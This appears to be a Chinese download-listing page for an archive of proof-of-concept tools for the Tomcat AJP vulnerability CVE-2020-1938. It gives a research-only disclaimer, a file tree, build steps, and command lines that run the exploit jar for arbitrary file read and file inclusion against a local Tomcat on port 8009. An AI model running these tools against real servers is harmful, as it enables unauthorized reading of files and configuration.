文件名称:CVE-2020-1938:CVE-2020-1938
文件大小:12.74MB
文件格式:ZIP
更新时间:2024-04-09 11:15:57
CVE-2020-1938 工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果由用户负责 通过测试研究发现,该突破危害及其严重,涉及非常广泛,如果发现建议立即进行修复 apache-tomcat-8.5.32.zip测试tomcat 验证工具-1(有BUG): 任意文件读取 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp 文件包含 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp 打包方式:在目录tomcat / ajp-bug执行mvn clean compile assembly:assembly 来源: : 验证工具-2
【文件预览】:
CVE-2020-1938-master
----.gitignore(10B)
----apache-tomcat-8.5.32.zip(10.89MB)
----1.jar(2.11MB)
----.DS_Store(6KB)
----1.png(45KB)
----README.md(1KB)
----AJPy()